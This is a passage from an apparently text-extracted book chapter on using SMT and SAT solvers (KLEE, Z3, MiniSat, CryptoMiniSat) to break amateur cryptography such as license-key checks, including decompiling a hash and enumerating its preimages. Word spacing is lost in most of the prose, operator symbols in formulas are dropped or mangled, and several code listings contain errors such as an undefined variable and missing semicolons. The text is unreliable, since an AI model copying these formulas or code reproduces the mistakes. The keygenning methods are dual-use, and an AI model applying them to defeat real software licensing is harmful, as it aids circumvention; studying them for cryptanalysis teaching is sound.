•ExtendingSATSolverstoCryptographicProblems
•ApplicationsofSATSolverstoCryptanalysisofHashFunctions
•Algebraic-DifferentialCryptanalysisofDES
10.2 Amateur cryptography
Thisiswhatyoucanfindinserialnumbers,licensekeys,executablefilepackers, CTF80,malware,etc.Some-
timesevenransomware(butrarelynowadays,in2017).
AmateurcryptographyisoftencanbebrokenusingSMTsolver,orevenKLEE.
Amateurcryptographyisusuallybasednotontheory,butonvisualcomplexity:ifitscreatorgettingresults
whichareseemschaoticenough,often,onestopstoimproveitfurther.Thisissecuritynotevenonobscurity,
butonchaoticmess. Thisisalsosometimescalled“TheFallacyofComplexManipulation”(see RFC4086).
Devisingyourowncryptoalgorithmisaverytrickythingtodo. Thiscanbecomparedtodevisingyour
ownPRNG. EvenfamousDonaldKnuthin1959constructedone,anditwasvisuallyverycomplex,but,as
itturnsoutinpractice,ithasveryshortcycleoflength3178. [Seealso: TheArtofComputerProgramming
vol.IIpage4,(1997).]
Theveryfirstproblemisthatmakinganalgorithmwhichcangenerateverylongexpressionsistrickything
itself. CommonerroristouseoperationslikeXORandrotations/permutations,whichcan’thelpmuch. Even
worse: somepeoplethinkthatXORingavalueseveraltimescanbebetter,like: (x1234) 5678. Obviously,
thesetwoXORoperations(ormoreprecisely,anynumberofit)canbereducedtoasingleone. Samestory
aboutappliedoperationslikeadditionandsubtraction—theyallalsocanbereducedtosingleone.
Realcryptoalgorithms,likeIDEA,canuseseveraloperationsfromdifferentgroups,likeXOR,additionand
multiplication. Applyingthemallinspecificorderwillmakeresultingexpressionirreducible.
WhenIpreparedthispart,Itriedtomakeanexampleofsuchamateurhashfunction:
// copypasted from http://blog.regehr.org/archives/1063
uint32_t rotl32b (uint32_t x, uint32_t n)
{
assert (n<32);
if (!n) return x;
return (x<<n) | (x>>(32-n));
}
uint32_t rotr32b (uint32_t x, uint32_t n)
{
assert (n<32);
if (!n) return x;
return (x>>n) | (x<<(32-n));
}
80CapturetheFlag
114
void megahash (uint32_t buf[4])
{
for (int i=0; i<4; i++)
{
uint32_t t0=buf[0]^0x12345678^buf[1];
uint32_t t1=buf[1]^0xabcdef01^buf[2];
uint32_t t2=buf[2]^0x23456789^buf[3];
uint32_t t3=buf[3]^0x0abcdef0^buf[0];
buf[0]=rotl32b(t0, 1);
buf[1]=rotr32b(t1, 2);
buf[2]=rotl32b(t2, 3);
buf[3]=rotr32b(t3, 4);
};
};
int main()
{
uint32_t buf[4];
klee_make_symbolic(buf, sizeof buf);
megahash (buf);
if (buf[0]==0x18f71ce6 // or whatever
&& buf[1]==0xf37c2fc9
&& buf[2]==0x1cfe96fe
&& buf[3]==0x8c02c75e)
klee_assert(0);
};
KLEEcanbreakitwithlittleeffort. Functionsofsuchcomplexityiscommoninshareware,whichchecks
licensekeys,etc.
Hereishowwecanmakeitsworkharderbymakingrotationsdependentofinputs,andthismakesnumber
ofpossibleinputsmuch,muchbigger:
void megahash (uint32_t buf[4])
{
for (int i=0; i<16; i++)
{
uint32_t t0=buf[0]^0x12345678^buf[1];
uint32_t t1=buf[1]^0xabcdef01^buf[2];
uint32_t t2=buf[2]^0x23456789^buf[3];
uint32_t t3=buf[3]^0x0abcdef0^buf[0];
buf[0]=rotl32b(t0, t1&0x1F);
buf[1]=rotr32b(t1, t2&0x1F);
buf[2]=rotl32b(t2, t3&0x1F);
buf[3]=rotr32b(t3, t0&0x1F);
};
};
Addition(ormodularaddition ,ascryptographerssay)canmakethingevenharder:
void megahash (uint32_t buf[4])
{
for (int i=0; i<4; i++)
{
uint32_t t0=buf[0]^0x12345678^buf[1];
uint32_t t1=buf[1]^0xabcdef01^buf[2];
uint32_t t2=buf[2]^0x23456789^buf[3];
uint32_t t3=buf[3]^0x0abcdef0^buf[0];
buf[0]=rotl32b(t0, t2&0x1F)+t1;
buf[1]=rotr32b(t1, t3&0x1F)+t2;
buf[2]=rotl32b(t2, t1&0x1F)+t3;
buf[3]=rotr32b(t3, t2&0x1F)+t4;
};
};
As en exercise, you can try to make a block cipher which KLEE wouldn’t break. This is quite sobering
experience.Butevenifyoucan,thisisnotapanacea,thereisanarrayofothercryptoanalyticalmethodsto
breakit.
Summary: ifyoudealwithamateurcryptography,youcanalwaysgiveKLEEandSMTsolveratry. Even
more: sometimesyouhaveonlydecryptionfunction,andifalgorithmissimpleenough,KLEEorSMTsolver
canreversethingsback.
115
Onefunthingtomention: ifyoutrytoimplementamateurcryptoalgorithminVerilog/VHDLlanguageto
runitonFPGA81,maybeinbrute-forceway,youcanfindthat EDA82toolscanoptimizemanythingsduring
synthesis(thisisthewordtheyusefor“compilation”)andcanleavecryptoalgorithmmuchsmaller/simpler
thanitwas. EvenifyoutrytoimplementDESalgorithm inbaremetal withafixedkey,AlteraQuartuscan
optimizefirstroundofitandmakeitsmallerthanothers.
10.2.1 Bugs
Anotherprominentfeatureofamateurcryptographyisbugs.Bugshereoftenleftuncaughtbecauseoutputof
encryptingfunctionvisuallylooked“goodenough”or“obfuscatedenough”,soadeveloperstoppedtowork
onit.
Thisisespeciallyfeatureofhashfunctions,becausewhenyouworkonblockcipher,youhavetodotwo
functions(encryption/decryption),whilehashingfunctionissingle.
WeirdesteveramateurencryptionalgorithmIoncesaw,encryptedonlyoddbytesofinputblock,while
evenbytesleftuntouched,sotheinputplaintexthasbeenpartiallyseenintheresultingencryptedblock.
Itwasencryptionroutineusedinlicensekeyvalidation. Hardtobelievesomeonedidthisonpurpose. Most
likely,itwasjustanunnoticedbug.
10.2.2 XOR ciphers
SimplestpossibleamateurcryptographyisjustapplicationofXORoperationusingsomekindoftable.Maybe
evensimpler. ThisisarealalgorithmIoncesaw:
for (i=0; i<size; i++)
buf[i]=buf[i]^(31*(i+1));
Thisisnotevenencryption,ratherconcealingorhiding.
10.2.3 Other features
TablesThereareoftentable(s)withpseudorandomdata,whichis/areusedchaotically.
Checksumming End-users can have proclivity to changing license codes, serial numbers, etc., with a
hopethiscouldaffectbehaviourofsoftware. Sothereisoftensomekindofchecksum: startingatsimple
summingand CRC. Thisiscloseto MAC83inrealcryptography.
10.2.4 Examples
•ApopularFLEXlmlicensemanagerwasbasedonasimpleamateurcryptoalgorithm(beforetheyswitched
toECC84),whichcanbecrackedeasily.
•PegasusMailPasswordDecoder: http://phrack.org/issues/52/3.html -averytypicalexample.
•You can find a lot of blog posts about breaking CTF-level crypto using Z3, etc. Here is one of them:
http://doar-e.github.io/blog/2015/08/18/keygenning-with-klee/ .
•Another:Automated algebraic cryptanalysis with OpenREIL and Z3 . By the way, this solution tracks
stateofeachregisterateachEIP/RIP,thisisalmostthesameas SSA,whichisheavilyusedincompiers
andworthlearning.
•ManyexamplesofamateurcryptographyI’vetakenfromanoldFraviawebsite: https://yurichev.
com/mirrors/amateur_crypto_examples_from_Fravia/ .
81Field-programmablegatearray
82Electronicdesignautomation
83Messageauthenticationcode
84Ellipticcurvecryptography
116
10.3 Case study: simple hash function
(Thispieceoftextwasinitiallyaddedtomy“ReverseEngineeringforBeginners”book( beginners.re )at
March2014)85.
Hereisone-wayhashfunction,thatconverteda64-bitvaluetoanotherandweneedtotrytoreverseits
flowback.
10.3.1 Manual decompiling
HereitsassemblylanguagelistinginIDA:
sub_401510 proc near
; ECX = input
mov rdx, 5D7E0D1F2E0F1F84h
mov rax, rcx ; input
imul rax, rdx
mov rdx, 388D76AEE8CB1500h
mov ecx, eax
and ecx, 0Fh
ror rax, cl
xor rax, rdx
mov rdx, 0D2E9EE7E83C4285Bh
mov ecx, eax
and ecx, 0Fh
rol rax, cl
lea r8, [rax+rdx]
mov rdx, 8888888888888889h
mov rax, r8
mul rdx
shr rdx, 5
mov rax, rdx
lea rcx, [r8+rdx*4]
shl rax, 6
sub rcx, rax
mov rax, r8
rol rax, cl
; EAX = output
retn
sub_401510 endp
TheexamplewascompiledbyGCC,sothefirstargumentispassedinECX.
Ifyoudon’thaveHex-Rays,orifyoudistrusttoit,youcantrytoreversethiscodemanually.Onemethod
istorepresenttheCPUregistersaslocalCvariablesandreplaceeachinstructionbyaone-lineequivalent
expression,like:
uint64_t f(uint64_t input)
{
uint64_t rax, rbx, rcx, rdx, r8;
ecx=input;
rdx=0x5D7E0D1F2E0F1F84;
rax=rcx;
rax*=rdx;
rdx=0x388D76AEE8CB1500;
rax=_lrotr(rax, rax&0xF); // rotate right
rax^=rdx;
rdx=0xD2E9EE7E83C4285B;
rax=_lrotl(rax, rax&0xF); // rotate left
r8=rax+rdx;
rdx=0x8888888888888889;
rax=r8;
rax*=rdx;
rdx=rdx>>5;
rax=rdx;
rcx=r8+rdx*4;
rax=rax<<6;
rcx=rcx-rax;
rax=r8
rax=_lrotl (rax, rcx&0xFF); // rotate left
85ThisexamplewasalsousedbyMurphyBerzishinhislectureabout SATandSMT:http://mirror.csclub.uwaterloo.ca/csclub/
mtrberzi-sat-smt-slides.pdf ,http://mirror.csclub.uwaterloo.ca/csclub/mtrberzi-sat-smt.mp4
117
return rax;
};
Ifyouarecarefulenough,thiscodecanbecompiledandwillevenworkinthesamewayastheoriginal.
Then,wearegoingtorewriteitgradually,keepinginmindallregistersusage.Attentionandfocusisvery
importanthere—anytinytypomayruinallyourwork!
Hereisthefirststep:
uint64_t f(uint64_t input)
{
uint64_t rax, rbx, rcx, rdx, r8;
ecx=input;
rdx=0x5D7E0D1F2E0F1F84;
rax=rcx;
rax*=rdx;
rdx=0x388D76AEE8CB1500;
rax=_lrotr(rax, rax&0xF); // rotate right
rax^=rdx;
rdx=0xD2E9EE7E83C4285B;
rax=_lrotl(rax, rax&0xF); // rotate left
r8=rax+rdx;
rdx=0x8888888888888889;
rax=r8;
rax*=rdx;
// RDX here is a high part of multiplication result
rdx=rdx>>5;
// RDX here is division result!
rax=rdx;
rcx=r8+rdx*4;
rax=rax<<6;
rcx=rcx-rax;
rax=r8
rax=_lrotl (rax, rcx&0xFF); // rotate left
return rax;
};
Nextstep:
uint64_t f(uint64_t input)
{
uint64_t rax, rbx, rcx, rdx, r8;
ecx=input;
rdx=0x5D7E0D1F2E0F1F84;
rax=rcx;
rax*=rdx;
rdx=0x388D76AEE8CB1500;
rax=_lrotr(rax, rax&0xF); // rotate right
rax^=rdx;
rdx=0xD2E9EE7E83C4285B;
rax=_lrotl(rax, rax&0xF); // rotate left
r8=rax+rdx;
rdx=0x8888888888888889;
rax=r8;
rax*=rdx;
// RDX here is a high part of multiplication result
rdx=rdx>>5;
// RDX here is division result!
rax=rdx;
rcx=(r8+rdx*4)-(rax<<6);
rax=r8
rax=_lrotl (rax, rcx&0xFF); // rotate left
return rax;
};
Wecanspotthedivisionusingmultiplication. Indeed,let’scalculatethedividerinWolframMathematica:
Listing1: WolframMathematica
118
In[1]:=N[2^(64 + 5)/16^^8888888888888889]
Out[1]:=60.
Wegetthis:
uint64_t f(uint64_t input)
{
uint64_t rax, rbx, rcx, rdx, r8;
ecx=input;
rdx=0x5D7E0D1F2E0F1F84;
rax=rcx;
rax*=rdx;
rdx=0x388D76AEE8CB1500;
rax=_lrotr(rax, rax&0xF); // rotate right
rax^=rdx;
rdx=0xD2E9EE7E83C4285B;
rax=_lrotl(rax, rax&0xF); // rotate left
r8=rax+rdx;
rax=rdx=r8/60;
rcx=(r8+rax*4)-(rax*64);
rax=r8
rax=_lrotl (rax, rcx&0xFF); // rotate left
return rax;
};
Onemorestep:
uint64_t f(uint64_t input)
{
uint64_t rax, rbx, rcx, rdx, r8;
rax=input;
rax*=0x5D7E0D1F2E0F1F84;
rax=_lrotr(rax, rax&0xF); // rotate right
rax^=0x388D76AEE8CB1500;
rax=_lrotl(rax, rax&0xF); // rotate left
r8=rax+0xD2E9EE7E83C4285B;
rcx=r8-(r8/60)*60;
rax=r8
rax=_lrotl (rax, rcx&0xFF); // rotate left
return rax;
};
Bysimplereducing,wefinallyseethatit’scalculatingtheremainder,notthequotient:
uint64_t f(uint64_t input)
{
uint64_t rax, rbx, rcx, rdx, r8;
rax=input;
rax*=0x5D7E0D1F2E0F1F84;
rax=_lrotr(rax, rax&0xF); // rotate right
rax^=0x388D76AEE8CB1500;
rax=_lrotl(rax, rax&0xF); // rotate left
r8=rax+0xD2E9EE7E83C4285B;
return _lrotl (r8, r8 % 60); // rotate left
};
Weendupwiththisfancyformattedsource-code:
#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>
#include <string.h>
#include <intrin.h>
#define C1 0x5D7E0D1F2E0F1F84
#define C2 0x388D76AEE8CB1500
#define C3 0xD2E9EE7E83C4285B
119
uint64_t hash(uint64_t v)
{
v*=C1;
v=_lrotr(v, v&0xF); // rotate right
v^=C2;
v=_lrotl(v, v&0xF); // rotate left
v+=C3;
v=_lrotl(v, v % 60); // rotate left
return v;
};
int main()
{
printf ("%llu\n", hash(...));
};
Sincewearenotcryptoanalystswecan’tfindaneasywaytogeneratetheinputvalueforsomespecific
outputvalue. Therotateinstruction’scoefficientslookfrightening—it’sawarrantythatthefunctionisnot
bijective,ithascollisions,or,speakingmoresimply,manyinputsmaybepossibleforoneoutput.
Brute-forceisnotsolutionbecausevaluesare64-bitones,that’sbeyondreality.
10.3.2 Now let’s use the Z3
Still,withoutanyspecialcryptographicknowledge,wemaytrytobreakthisalgorithmusingZ3.
HereisthePythonsourcecode:
1#!/usr/bin/env python
2
3from z3 import *
4
5C1=0x5D7E0D1F2E0F1F84
6C2=0x388D76AEE8CB1500
7C3=0xD2E9EE7E83C4285B
8
9inp, i1, i2, i3, i4, i5, i6, outp = BitVecs('inp i1 i2 i3 i4 i5 i6 outp', 64)
10
11 s = Solver()
12 s.add(i1==inp*C1)
13 s.add(i2==RotateRight (i1, i1 & 0xF))
14 s.add(i3==i2 ^ C2)
15 s.add(i4==RotateLeft(i3, i3 & 0xF))
16 s.add(i5==i4 + C3)
17 s.add(outp==RotateLeft (i5, URem(i5, 60)))
18
19 s.add(outp==10816636949158156260)
20
21 print s.check()
22 m=s.model()
23 print m
24 print (" inp=0x%X" % m[inp].as_long())
25 print ("outp=0x%X" % m[outp].as_long())
Thisisgoingtobeourfirstsolver.
We see the variable definitions on line 7. These are just 64-bit variables. i1..i6are intermediate
variables,representingthevaluesintheregistersbetweeninstructionexecutions.
Thenweaddtheso-calledconstraintsonlines10..15.Thelastconstraintat17isthemostimportantone:
wearegoingtotrytofindaninputvalueforwhichouralgorithmwillproduce10816636949158156260.
RotateRight,RotateLeft,URem —arefunctionsfromtheZ3PythonAPI,notrelatedtoPythonlanguage.
Thenwerunit:
...>python.exe 1.py
sat
[i1 = 3959740824832824396,
i3 = 8957124831728646493,
i5 = 10816636949158156260,
inp = 1364123924608584563,
outp = 10816636949158156260,
i4 = 14065440378185297801,
i2 = 4954926323707358301]
inp=0x12EE577B63E80B73
outp=0x961C69FF0AEFD7E4
120
“sat”mean“satisfiable”,i.e.,thesolverwasabletofindatleastonesolution. Thesolutionisprintedin
thesquarebrackets. Thelasttwolinesaretheinput/outputpairinhexadecimalform. Yes,indeed,ifwerun
ourfunctionwith 0x12EE577B63E80B73 asinput,thealgorithmwillproducethevaluewewerelookingfor.
But,aswenoticedbefore,thefunctionweworkwithisnotbijective,sotheremaybeothercorrectinput
values. The Z3 is not capable of producing more than one result, but let’s hack our example slightly, by
addingline19,whichimplies“lookforanyotherresultsthanthis”:
1#!/usr/bin/env python
2
3from z3 import *
4
5C1=0x5D7E0D1F2E0F1F84
6C2=0x388D76AEE8CB1500
7C3=0xD2E9EE7E83C4285B
8
9inp, i1, i2, i3, i4, i5, i6, outp = BitVecs('inp i1 i2 i3 i4 i5 i6 outp', 64)
10
11 s = Solver()
12 s.add(i1==inp*C1)
13 s.add(i2==RotateRight (i1, i1 & 0xF))
14 s.add(i3==i2 ^ C2)
15 s.add(i4==RotateLeft(i3, i3 & 0xF))
16 s.add(i5==i4 + C3)
17 s.add(outp==RotateLeft (i5, URem(i5, 60)))
18
19 s.add(outp==10816636949158156260)
20
21 s.add(inp!=0x12EE577B63E80B73)
22
23 print s.check()
24 m=s.model()
25 print m
26 print (" inp=0x%X" % m[inp].as_long())
27 print ("outp=0x%X" % m[outp].as_long())
Indeed,itfindsanothercorrectresult:
...>python.exe 2.py
sat
[i1 = 3959740824832824396,
i3 = 8957124831728646493,
i5 = 10816636949158156260,
inp = 10587495961463360371,
outp = 10816636949158156260,
i4 = 14065440378185297801,
i2 = 4954926323707358301]
inp=0x92EE577B63E80B73
outp=0x961C69FF0AEFD7E4
Thiscanbeautomated. Eachfoundresultcanbeaddedasaconstraintandthenthenextresultwillbe
searchedfor. Hereisaslightlymoresophisticatedexample:
1#!/usr/bin/env python
2
3from z3 import *
4
5C1=0x5D7E0D1F2E0F1F84
6C2=0x388D76AEE8CB1500
7C3=0xD2E9EE7E83C4285B
8
9inp, i1, i2, i3, i4, i5, i6, outp = BitVecs('inp i1 i2 i3 i4 i5 i6 outp', 64)
10
11 s = Solver()
12 s.add(i1==inp*C1)
13 s.add(i2==RotateRight (i1, i1 & 0xF))
14 s.add(i3==i2 ^ C2)
15 s.add(i4==RotateLeft(i3, i3 & 0xF))
16 s.add(i5==i4 + C3)
17 s.add(outp==RotateLeft (i5, URem(i5, 60)))
18
19 s.add(outp==10816636949158156260)
20
21 # copypasted from http://stackoverflow.com/questions/11867611/z3py-checking-all-solutions-for-equation
22 result=[]
121
23 while True:
24 if s.check() == sat:
25 m = s.model()
26 print m[inp]
27 result.append(m)
28 # Create a new constraint the blocks the current model
29 block = []
30 for d in m:
31 # d is a declaration
32 if d.arity() > 0:
33 raise Z3Exception("uninterpreted functions are not supported")
34 # create a constant from declaration
35 c=d()
36 if is_array(c) or c.sort().kind() == Z3_UNINTERPRETED_SORT:
37 raise Z3Exception("arrays and uninterpreted sorts are not supported")
38 block.append(c != m[d])
39 s.add(Or(block))
40 else:
41 print "results total=",len(result)
42 break
Wegot:
1364123924608584563
1234567890
9223372038089343698
4611686019661955794
13835058056516731602
3096040143925676201
12319412180780452009
7707726162353064105
16931098199207839913
1906652839273745429
11130024876128521237
15741710894555909141
6518338857701133333
5975809943035972467
15199181979890748275
10587495961463360371
results total= 16
Sothereare16correctinputvaluesfor 0x92EE577B63E80B73 asaresult.
Thesecondis1234567890—itisindeedthevaluewhichwasusedbymeoriginallywhilepreparingthis
example.
Let’salsotrytoresearchouralgorithmabitmore. Actingonasadisticwhim,let’sfindifthereareany
possibleinput/outputpairsinwhichthelower32-bitpartsareequaltoeachother?
Let’sremovethe outpconstraintandaddanother,atline17:
1#!/usr/bin/env python
2
3from z3 import *
4
5C1=0x5D7E0D1F2E0F1F84
6C2=0x388D76AEE8CB1500
7C3=0xD2E9EE7E83C4285B
8
9inp, i1, i2, i3, i4, i5, i6, outp = BitVecs('inp i1 i2 i3 i4 i5 i6 outp', 64)
10
11 s = Solver()
12 s.add(i1==inp*C1)
13 s.add(i2==RotateRight (i1, i1 & 0xF))
14 s.add(i3==i2 ^ C2)
15 s.add(i4==RotateLeft(i3, i3 & 0xF))
16 s.add(i5==i4 + C3)
17 s.add(outp==RotateLeft (i5, URem(i5, 60)))
18
19 s.add(outp & 0xFFFFFFFF == inp & 0xFFFFFFFF)
20
21 print s.check()
22 m=s.model()
23 print m
24 print (" inp=0x%X" % m[inp].as_long())
25 print ("outp=0x%X" % m[outp].as_long())
Itisindeedso:
122
sat
[i1 = 14869545517796235860,
i3 = 8388171335828825253,
i5 = 6918262285561543945,
inp = 1370377541658871093,
outp = 14543180351754208565,
i4 = 10167065714588685486,
i2 = 5541032613289652645]
inp=0x13048F1D12C00535
outp=0xC9D3C17A12C00535
Let’sbemoresadisticandaddanotherconstraint: last16bitsmustbe 0x1234:
1#!/usr/bin/env python
2
3from z3 import *
4
5C1=0x5D7E0D1F2E0F1F84
6C2=0x388D76AEE8CB1500
7C3=0xD2E9EE7E83C4285B
8
9inp, i1, i2, i3, i4, i5, i6, outp = BitVecs('inp i1 i2 i3 i4 i5 i6 outp', 64)
10
11 s = Solver()
12 s.add(i1==inp*C1)
13 s.add(i2==RotateRight (i1, i1 & 0xF))
14 s.add(i3==i2 ^ C2)
15 s.add(i4==RotateLeft(i3, i3 & 0xF))
16 s.add(i5==i4 + C3)
17 s.add(outp==RotateLeft (i5, URem(i5, 60)))
18
19 s.add(outp & 0xFFFFFFFF == inp & 0xFFFFFFFF)
20 s.add(outp & 0xFFFF == 0x1234)
21
22 print s.check()
23 m=s.model()
24 print m
25 print (" inp=0x%X" % m[inp].as_long())
26 print ("outp=0x%X" % m[outp].as_long())
Ohyes,thispossibleaswell:
sat
[i1 = 2834222860503985872,
i3 = 2294680776671411152,
i5 = 17492621421353821227,
inp = 461881484695179828,
outp = 419247225543463476,
i4 = 2294680776671411152,
i2 = 2834222860503985872]
inp=0x668EEC35F961234
outp=0x5D177215F961234
Z3worksveryfastanditimpliesthatthealgorithmisweak,itisnotcryptographicatall(likethemostof
theamateurcryptography).
11SAT-solvers
SMTvs. SATislikehighlevel PLvs. assemblylanguage. Thelattercanbemuchmoreefficient,butit’shard
toprograminit.
11.1 CNF form
CNF86isanormalform.
Anybooleanexpressioncanbeconvertedto normalform andCNFisoneofthem. The CNFexpression
isabunchofclauses(sub-expressions)constistingofterms(variables),ORsandNOTs,allofwhicharethen
86https://en.wikipedia.org/wiki/Conjunctive_normal_form
123
glueledtogetherwithANDintoafullexpression. Thereisawaytomemorizeit: CNFis“ANDofORs”(or
“productofsums”)and DNF87is“ORofANDs”(or“sumofproducts”).
Exampleis: (:A_B)^(C_ :D).
_standsforOR(logicaldisjunction88),“+”signisalsosometimesusedforOR.
^standsforAND(logicalconjunction89).Itiseasytomemorize: ^lookslike“A”letter.“ ”isalsosometimes
usedforAND.
:isnegation(NOT).
11.2 Example: 2-bit adder
SAT-solverismerelyasolverofhugebooleanequationsinCNFform.Itjustgivestheanswer,ifthereisaset
ofinputvalueswhichcansatisfyCNFexpression,andwhatinputvaluesmustbe.
Hereisa2-bitadderforexample:
Figure9:2-bitaddercircuit
Theadderinitssimplestform:ithasnocarry-inandcarry-out,andithas3XORgatesandoneANDgate.
Let’strytofigureout,whichsetsofinputvalueswillforceaddertosetbothtwooutputbits? Bydoingquick
memorycalculation,wecanseethatthereare4waystodoso: 0 + 3 = 3,1 + 2 = 3,2 + 1 = 3,3 + 0 = 3.Hereis
alsotruthtable,withtheserowshighlighted:
87Disjunctivenormalform
88https://en.wikipedia.org/wiki/Logical_disjunction
89https://en.wikipedia.org/wiki/Logical_conjunction
124
aH aL bH bL qH qL
3+3=6 2(mod4) 1 1 1 1 1 0
3+2=5 1(mod4) 1 1 1 0 0 1
3+1=4 0(mod4) 1 1 0 1 0 0
3+0=3 3(mod4) 1 1 0 0 1 1
2+3=5 1(mod4) 1 0 1 1 0 1
2+2=4 0(mod4) 1 0 1 0 0 0
2+1=3 3(mod4) 1 0 0 1 1 1
2+0=2 2(mod4) 1 0 0 0 1 0
1+3=4 0(mod4) 0 1 1 1 0 0
1+2=3 3(mod4) 0 1 1 0 1 1
1+1=2 2(mod4) 0 1 0 1 1 0
1+0=1 1(mod4) 0 1 0 0 0 1
0+3=3 3(mod4) 0 0 1 1 1 1
0+2=2 2(mod4) 0 0 1 0 1 0
0+1=1 1(mod4) 0 0 0 1 0 1
0+0=0 0(mod4) 0 0 0 0 0 0
Let’sfind,what SAT-solvercansayaboutit?
First,weshouldrepresentour2-bitadderas CNFexpression.
UsingWolframMathematica,wecanexpress1-bitexpressionforbothadderoutputs:
In[]:=AdderQ0[aL_,bL_]=Xor[aL,bL]
Out[]:=aL ⊻bL
In[]:=AdderQ1[aL_,aH_,bL_,bH_]=Xor[And[aL,bL],Xor[aH,bH]]
Out[]:=aH ⊻bH⊻(aL && bL)
Weneedsuchexpression, wherebothpartswillgenerate1’s. Let’suseWolframMathematicafindallin-
stancesofsuchexpression(IglueledbothpartswithAnd):
In[]:=Boole[SatisfiabilityInstances[And[AdderQ0[aL,bL],AdderQ1[aL,aH,bL,bH]],{aL,aH,bL,bH},4]]
Out[]:={1,1,0,0},{1,0,0,1},{0,1,1,0},{0,0,1,1}
Yes,indeed,Mathematicasays,thereare4inputswhichwillleadtotheresultweneed.So,Mathematicacan
alsobeusedas SATsolver.
Nevertheless,let’sproceedto CNFform. UsingMathematicaagain,let’sconvertourexpressionto CNF
form:
In[]:=cnf=BooleanConvert[And[AdderQ0[aL,bL],AdderQ1[aL,aH,bL,bH]],``CNF'']
Out[]:=(!aH ∥!bH) && (aH ∥bH) && (!aL ∥!bL) && (aL ∥bL)
Looksmorecomplex. Thereasonofsuchverbosityisthat CNFformdoesn’tallowXORoperations.
125
11.2.1 MiniSat
Forthestarters,wecantryMiniSat90.Thestandardwaytoencode CNFexpressionforMiniSatistoenumerate
allORpartsateachline. Also,MiniSatdoesn’tsupportvariablenames,justnumbers. Let’senumerateour
variables: 1willbeaH,2–aL,3–bH,4–bL.
HereiswhatI’vegotwhenIconvertedMathematicaexpressiontotheMiniSatinputfile:
p cnf 4 4
-1 -3 0
1 3 0
-2 -4 0
2 4 0
Two4’satthefirstlinesarenumberofvariablesandnumberofclausesrespectively. Thereare4lines
then,eachforeachORclause.Minusbeforevariablenumbermeaningthatthevariableisnegated.Absence
ofminus–notnegated. Zeroattheendisjustterminatingzero,meaningendoftheclause.
Inotherwords,eachlineisOR-clausewithoptionalnegations,andthetaskofMiniSatistofindsuchset
ofinput,whichcansatisfyalllinesintheinputfile.
ThatfileInamedas adder.cnfandnowlet’stryMiniSat:
% minisat -verb=0 adder.cnf results.txt
SATISFIABLE
Theresultsarein results.txtfile:
SAT
-1 -2 3 4 0
Thismeans,ifthefirsttwovariables(aHandaL)willbe false,andthelasttwovariables(bHandbL)will
besettotrue,thewholeCNFexpressionissatisfiable.Seemstobetrue:ifbHandbLaretheonlyinputsset
totrue,bothresultingbitsarealsohas truestates.
Nowhowtogetotherinstances? SAT-solvers,like SMTsolvers,produceonlyonesolution(or instance).
MiniSatuses PRNGanditsinitialseedcanbesetexplicitely. Itrieddifferentvalues,butresultisstillthe
same. Nevertheless,CryptoMiniSatinthiscasewasabletoshowallpossible4instances,inchaoticorder,
though. Sothisisnotveryrobustway.
Perhaps,theonlyknownwayistonegatesolutionclauseandaddittotheinputexpression. We’vegot
-1 -2 3 4,nowwecannegateallvaluesinit(justtoggleminuses: 1 2 -3 -4)andaddittotheendof
theinputfile:
p cnf 4 5
-1 -3 0
1 3 0
-2 -4 0
2 4 0
1 2 -3 -4
Nowwe’vegotanotherresult:
SAT
1 2 -3 -4 0
Thismeans,aHandaLmustbeboth trueandbHandbLmustbe false,tosatisfytheinputexpression.
Let’snegatethisclauseandadditagain:
p cnf 4 6
-1 -3 0
1 3 0
-2 -4 0
2 4 0
1 2 -3 -4
-1 -2 3 4 0
Theresultis:
SAT
-1 2 3 -4 0
aH=false,aL=true,bH=true,bL=false. Thisisalsocorrect,accordingtoourtruthtable.
Let’sadditagain:
90http://minisat.se/MiniSat.html
126
p cnf 4 7
-1 -3 0
1 3 0
-2 -4 0
2 4 0
1 2 -3 -4
-1 -2 3 4 0
1 -2 -3 4 0
SAT
1 -2 -3 4 0
aH=true,aL=false,bH=false,bL=true. Thisisalsocorrect.
Thisisfourthresult. Thereareshouldn’tbemore. Whatiftoaddit?
p cnf 4 8
-1 -3 0
1 3 0
-2 -4 0
2 4 0
1 2 -3 -4
-1 -2 3 4 0
1 -2 -3 4 0
-1 2 3 -4 0
NowMiniSatjustsays“UNSATISFIABLE”withoutanyadditionalinformationintheresultingfile.
Ourexampleistiny,butMiniSatcanworkwithhuge CNFexpressions.
11.2.2 CryptoMiniSat
XOR operation is absent in CNFform, but crucial in cryptographical algorithms. Simplest possible way to
representsingleXORoperationin CNFformis: (:x_ :y)^(x_y)–notthatsmallexpression,though,many
XORoperationsinsingleexpressioncanbeoptimizedbetter.
OnesignificantdifferencebetweenMiniSatandCryptoMiniSatisthatthelattersupportsclauseswithXOR
operationsinsteadofORs,becauseCryptoMiniSathasaimtoanalyzecryptoalgorithms91. XORclausesare
handledbyCryptoMiniSatinaspecialwaywithouttranslatingtoORclauses.
Youneedjusttoprependaclausewith“x”in CNFfileandORclauseisthentreatedasXORclauseby
CryptoMiniSat. Asof2-bitadder,thissmallestpossibleXOR-CNFexpressioncanbeusedtofindallinputs
wherebothoutputadderbitsareset:
(aHbH)^(aLbL)
Thisis .cnffileforCryptoMiniSat:
p cnf 4 2
x1 3 0
x2 4 0
NowIrunCryptoMiniSatwithvariousrandomvaluestoinitializeits PRNG...
% cryptominisat4 --verb 0 --random 0 XOR_adder.cnf
s SATISFIABLE
v 1 2 -3 -4 0
% cryptominisat4 --verb 0 --random 1 XOR_adder.cnf
s SATISFIABLE
v -1 -2 3 4 0
% cryptominisat4 --verb 0 --random 2 XOR_adder.cnf
s SATISFIABLE
v 1 -2 -3 4 0
% cryptominisat4 --verb 0 --random 3 XOR_adder.cnf
s SATISFIABLE
v 1 2 -3 -4 0
% cryptominisat4 --verb 0 --random 4 XOR_adder.cnf
s SATISFIABLE
v -1 2 3 -4 0
% cryptominisat4 --verb 0 --random 5 XOR_adder.cnf
s SATISFIABLE
v -1 2 3 -4 0
% cryptominisat4 --verb 0 --random 6 XOR_adder.cnf
s SATISFIABLE
91http://www.msoos.org/xor-clauses/
127
v -1 -2 3 4 0
% cryptominisat4 --verb 0 --random 7 XOR_adder.cnf
s SATISFIABLE
v 1 -2 -3 4 0
% cryptominisat4 --verb 0 --random 8 XOR_adder.cnf
s SATISFIABLE
v 1 2 -3 -4 0
% cryptominisat4 --verb 0 --random 9 XOR_adder.cnf
s SATISFIABLE
v 1 2 -3 -4 0
Nevertheless,all4possiblesolutionsare:
v -1 -2 3 4 0
v -1 2 3 -4 0
v 1 -2 -3 4 0
v 1 2 -3 -4 0
...thesameasreportedbyMiniSat.
